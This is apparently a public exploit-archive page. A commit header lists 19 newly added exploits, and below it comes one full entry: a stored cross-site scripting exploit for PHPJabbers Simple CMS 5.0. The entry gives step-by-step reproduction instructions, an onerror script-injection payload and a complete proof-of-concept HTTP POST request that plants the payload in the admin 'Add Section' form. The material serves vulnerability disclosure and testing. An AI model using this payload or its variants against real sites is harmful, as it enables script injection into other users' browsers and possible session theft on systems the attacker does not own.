668314bbda
19 changes to exploits/shellcodes/ghdb FS-S3900-24T4S - Privilege Escalation Virtual Reception v1.0 - Web Server Directory Traversal admidio v4.2.5 - CSV Injection Companymaps v8.0 - Stored Cross Site Scripting (XSS) GLPI 9.5.7 - Username Enumeration OpenEMR v7.0.1 - Authentication credentials brute force PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) PHPJabbers Simple CMS 5.0 - SQL Injection PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS) phpMyFAQ v3.1.12 - CSV Injection projectSend r1605 - Private file download revive-adserver v5.4.1 - Cross-Site Scripting (XSS) Serendipity 2.4.0 - File Inclusion RCE SoftExpert (SE) Suite v2.1.3 - Local File Inclusion Advanced Host Monitor v12.56 - Unquoted Service Path MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
46 lines
No EOL
1.9 KiB
Text
46 lines
No EOL
1.9 KiB
Text
# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)
|
|
# Date: 2023-04-29
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://www.phpjabbers.com/faq.php
|
|
# Software Link: https://www.phpjabbers.com/simple-cms/
|
|
# Version: 5.0
|
|
# Tested on: Kali Linux
|
|
|
|
### Steps to Reproduce ###
|
|
|
|
- Please login from this address:
|
|
https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin
|
|
- Click on the "Add Section" button.
|
|
- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the
|
|
"Section" box and save it.
|
|
- Boom! An alert message saying "Stored" will appear in front of you.
|
|
|
|
### PoC Request ###
|
|
|
|
POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
|
|
HTTP/1.1
|
|
Host: localhost
|
|
Cookie: pj_sid=PJ1.0.6199026527.1682777172;
|
|
pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1;
|
|
PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1;
|
|
pjd=7l9bb4ubmknrdbns46j7g5cqn7
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
|
|
Firefox/102.0
|
|
Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 371
|
|
Origin: https://localhost
|
|
Referer:
|
|
https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: document
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-User: ?1
|
|
Te: trailers
|
|
Connection: close
|
|
|
|
section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T |